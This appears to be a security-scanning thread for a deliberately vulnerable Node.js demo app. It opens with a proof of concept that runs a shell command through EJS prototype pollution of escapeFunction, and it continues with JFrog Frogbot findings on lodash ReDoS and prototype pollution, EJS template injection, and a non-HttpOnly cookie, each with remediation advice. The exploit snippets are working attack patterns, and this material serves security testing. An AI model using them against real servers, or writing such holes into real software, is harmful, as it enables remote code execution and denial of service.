The following code will execute a command on the server by polluting opts.escapeFunction:

const express = require('express');
const app = express();
const port = 8008;
const ejs = require('ejs');

// Set EJS as the view engine
app.set('view engine', 'ejs');

app.get('/', (req, res) => {
    
    const data = {title: 'Welcome', message: 'Hello'};

    // Sample EJS template string
    const templateString = `<html><head><title><%= title %></title></head><body><h1><%= message %></h1></body></html>`;

    const { exec } = require('child_process');

    function myFunc() {
        exec('bash -c "echo 123"', (error, stdout, stderr) => {
            if (error) {
                console.error(`exec error: ${error}`);
                return;
            }
            if (stderr){
                console.log(`stderr : ${stderr}`);
                return;
            }
            // Handle success
            console.log(`Command executed successfully. Output: ${stdout}`);
        });
    }

    const options = {client:false};

    Object.prototype.escapeFunction = myFunc;
    
    const compiledTemplate = ejs.compile(templateString, options);
    const renderedHtml = compiledTemplate(data);
    res.send(renderedHtml);
});

// Start the server
app.listen(port, () => {
    console.log(`Server is running on http://localhost:${port}`);
});

[ CVE-2020-28500 ] lodash 4.17.0 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Medium
Contextual Analysis:	Not Applicable
Direct Dependencies:	lodash:4.17.0
Impacted Dependency:	lodash:4.17.0
Fixed Versions:	[4.17.21]
CVSS V3:	5.3

ReDoS in lodash could lead to a denial of service when handling untrusted strings.

🔬 JFrog Research Details

Description:
JavaScript-based applications that use lodash and specifically the _.toNumber, _.trim and _.trimEnd functions, could be vulnerable to DoS (Denial of Service) through a faulty regular expression that introduces a ReDoS (Regular Expression DoS) vulnerability. This vulnerability is only triggered if untrusted user input flows into these vulnerable functions and the attacker can supply arbitrary long strings (over 50kB) that contain whitespaces.

On a modern Core i7-based system, calling the vulnerable functions with a 50kB string could take between 2 to 3 seconds to execute and 4.5 minutes for a longer 500kB string. The fix improved the regular expression performance so it took only a few milliseconds on the same Core i7-based system. This vulnerability is easily exploitable as all is required is to build a string that triggers it as can be seen in this PoC reproducing code -

var untrusted_user_input_50k = "a" + ' '.repeat(50000) + "z"; // assume this is provided over the network
lo.trimEnd(untrusted_user_input_50k); // should take a few seconds to run
var untrusted_user_input_500k = "a" + ' '.repeat(500000) + "z"; // assume this is provided over the network
lo.trimEnd(untrusted_user_input_500k); // should take a few minutes to run

Remediation:

Deployment mitigations

Trim untrusted strings based on size before providing it to the vulnerable functions by using the substring function to with a fixed maximum size like so - js untrusted_user_input.substring(0, max_string_size_less_than_50kB);

---

🐸 JFrog Frogbot

[github-actions]

lodash.defaultsDeep({}, evilsrc)

at server.js (line 5)

📦🔍 Contextual Analysis CVE

Severity	ID	Impacted Dependency	Finding
Critical	CVE-2019-10744	lodash:4.17.0	The vulnerable function defaultsDeep is called with external input

Description

The scanner checks whether the vulnerable function `defaultsDeep` is called with external input to its 2nd (`sources`) argument, and the `Object.freeze()` remediation is not present.

CVE details

Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.

Remediation

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

---

🐸 JFrog Frogbot

[github-actions]

app.set('view engine', 'ejs')
res.render('pages/index',req.query)

at server.js (line 11)

📦🔍 Contextual Analysis CVE

Severity	ID	Impacted Dependency	Finding
Critical	CVE-2022-29078	ejs:3.1.6	The vulnerable functionality is triggered since express.set is called with 'view engine' as the first argument and 'ejs' as the second argument or both arguments with external input

Description

The scanner checks for two vulnerable flows:

1. Whether the express.set function is called with the arguments: view engine and ejs, or external input and if it's followed by a call to the vulnerable function render with an unknown second argument.

2. Whether the renderFile function is called with an unknown second argument.

The scanner also checks whether the Object.freeze() remediation is not present.

CVE details

The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).

Remediation

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

Note that this mitigation is supposed to stop any prototype pollution attacks which can allow an attacker to control the opts.outputFunctionName parameter indirectly.

The mitigation will not stop any (extremely unlikely) scenarios where the JavaScript code allows external input to directly affect opts.outputFunctionName.

---

🐸 JFrog Frogbot

[github-actions]

app.set('view engine', 'ejs')
res.render('pages/index',req.query)

at server.js (line 20)

📦🔍 Contextual Analysis CVE

Severity	ID	Impacted Dependency	Finding
Critical	CVE-2022-29078	ejs:3.1.6	The vulnerable function render is called

Description

The scanner checks for two vulnerable flows:

1. Whether the express.set function is called with the arguments: view engine and ejs, or external input and if it's followed by a call to the vulnerable function render with an unknown second argument.

2. Whether the renderFile function is called with an unknown second argument.

The scanner also checks whether the Object.freeze() remediation is not present.

CVE details

The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).

Remediation

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

Note that this mitigation is supposed to stop any prototype pollution attacks which can allow an attacker to control the opts.outputFunctionName parameter indirectly.

The mitigation will not stop any (extremely unlikely) scenarios where the JavaScript code allows external input to directly affect opts.outputFunctionName.

---

🐸 JFrog Frogbot

[github-actions]

lodash.defaultsDeep({}, evilsrc)

at server.js (line 5)

📦🔍 Contextual Analysis CVE

Severity	ID	Impacted Dependency	Finding
Medium	CVE-2018-16487	lodash:4.17.0	The vulnerable function merge/mergeWith/defaultsDeep is called with external input

Description

The scanner checks whether any of the following vulnerable functions are called:

• lodash.merge with external input to its 2nd (sources) argument.
• lodash.mergeWith with external input to its 2nd (sources) argument.
• lodash.defaultsDeep with external input to its 2nd (sources) argument.

The scanner also checks whether the Object.freeze() remediation is not present.

CVE details

A prototype pollution vulnerability was found in lodash <4.17.11 where the functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of Object.prototype.

Remediation

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

---

🐸 JFrog Frogbot

[github-actions]

session({
    cookie: {
      domain: "domain.org",
      secure: true,
      httpOnly: false,
      name: "cookie",
      maxAge: 12 * 60 * 60 * 1000,
      path: "/",
    },
  })

at server.js (line 28)

🎯 Static Application Security Testing (SAST) Violation

Severity	ID	Finding	Watch Name	Policies
Medium	SAST-00002	Cookies sent without 'HttpOnly' attribute	shani_ejs_build	shani_ejs_build shani-npm-cli

Full description

Violation Details

Rule ID:	js-http-only

Overview

Sensitive Cookie Without 'HttpOnly' Flag in JavaScript refers to the
absence of the 'HttpOnly' flag in the configuration of a cookie,
potentially leading to security vulnerabilities. When the 'HttpOnly'
flag is not set, the cookie becomes accessible by client-side scripts,
exposing sensitive information to potential cross-site scripting (XSS)
attacks. To enhance security, it is crucial to follow best practices
by ensuring the 'HttpOnly' flag is properly configured for sensitive cookies.

Vulnerable Example

var express = require("express");
var session = require("express-session");
var app = express();

app.use(
  session({
    cookie: {
      domain: "domain.org",
      secure: true,
      httpOnly: false, // Vulnerable
      name: "sensitive_cookie",
      maxAge: 12 * 60 * 60 * 1000,
      path: "/",
    },
  })
);

In this example, the 'HttpOnly' flag is not set, allowing the sensitive
cookie to be accessed by client-side scripts.

Remediation

var express = require("express");
var session = require("express-session");
var app = express();

app.use(
  session({
    cookie: {
      domain: "domain.org",
      secure: true,
-     httpOnly: false, // Vulnerable
+     httpOnly: true, // Corrected
      name: "sensitive_cookie",
      maxAge: 12 * 60 * 60 * 1000,
      path: "/",
    },
  })
);

By setting 'HttpOnly' to true, the sensitive cookie becomes inaccessible
to client-side scripts, reducing the risk of XSS attacks.

Explanation:

In the vulnerable example, the 'HttpOnly' flag is set to false, allowing
the sensitive cookie to be accessed by JavaScript running on the client side.
The remediation involves setting 'HttpOnly' to true, preventing client-side
script access and enhancing the security of the sensitive cookie.
It is essential to configure the 'HttpOnly' flag appropriately to protect
sensitive information from potential XSS vulnerabilities.

---

🐸 JFrog Frogbot

[github-actions]

req.query

at server.js (line 20)

🎯 Static Application Security Testing (SAST) Violation

Severity	ID	Finding	Watch Name	Policies
High	SAST-00003	Untrusted input is used as a response template	shani_ejs_build	shani_ejs_build shani-npm-cli

Full description

Violation Details

Rule ID:	js-template-injection

Overview

Template Object Injection (TOI) is a vulnerability that can occur in
web applications that use template engines to render dynamic content.
Template engines are commonly used to generate HTML pages, emails, or
other types of documents that include variable data. TOI happens when
untrusted user input is included as part of the template rendering
process, and the template engine evaluates the input as a code
expression, leading to potential code injection or data tampering
attacks. To prevent TOI vulnerabilities, it's important to sanitize and
validate all user input that is used as part of the template rendering
process.

Query operation

In this query we look for user inputs that flow directly to a
request render.

Vulnerable example

var app = require('express')();
app.set('view engine', 'hbs');

app.use(require('body-parser').json());
app.use(require('body-parser').urlencoded({ extended: false }));
app.post('/path', function(req, res) {
    var bodyParameter = req.body.bodyParameter;
    var queryParameter = req.query.queryParameter;
    res.render('template', bodyParameter);
});

In this example, a user-provided data is injected directly into the
render command, leading to potential code injection or data
tampering attacks.

Remediation

+   const sanitizeHtml = require('sanitize-html');
var app = require('express')();
app.set('view engine', 'hbs');
app.use(require('body-parser').json());
app.use(require('body-parser').urlencoded({ extended: false }));
app.post('/path', function(req, res) {
    var bodyParameter = req.body.bodyParameter;
    var queryParameter = req.query.queryParameter;

-       res.render('template', bodyParameter);
+       res.render('template', sanitizeHtml(bodyParameter));
});
Using `sanitize-html`, the user-provided data is sanitized, before
rendering to the response.

---

🐸 JFrog Frogbot